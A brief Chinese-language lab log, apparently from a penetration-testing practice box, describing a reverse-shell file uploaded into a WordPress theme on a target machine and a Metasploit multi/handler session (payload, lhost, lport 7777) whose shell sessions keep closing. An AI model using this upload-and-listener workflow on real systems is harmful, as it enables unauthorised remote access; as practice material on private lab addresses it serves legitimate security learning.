靶机为192.168.2.128,kali机为192.168.2.210
已经上传msf反弹连接
也可以进行登入,但msf监听运行的时候失败
http://192.168.2.128/wordpress/wp-content/themes/twentynineteen/secret.php
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set playload php/meterpreter/reverse_tcp
playload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.2.210
lhost => 192.168.2.210
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.210:7777
[] 192.168.2.128 - Command shell session 1 closed.
[] 192.168.2.128 - Command shell session 2 closed.
[] 192.168.2.128 - Command shell session 3 closed.
[] 192.168.2.128 - Command shell session 4 closed.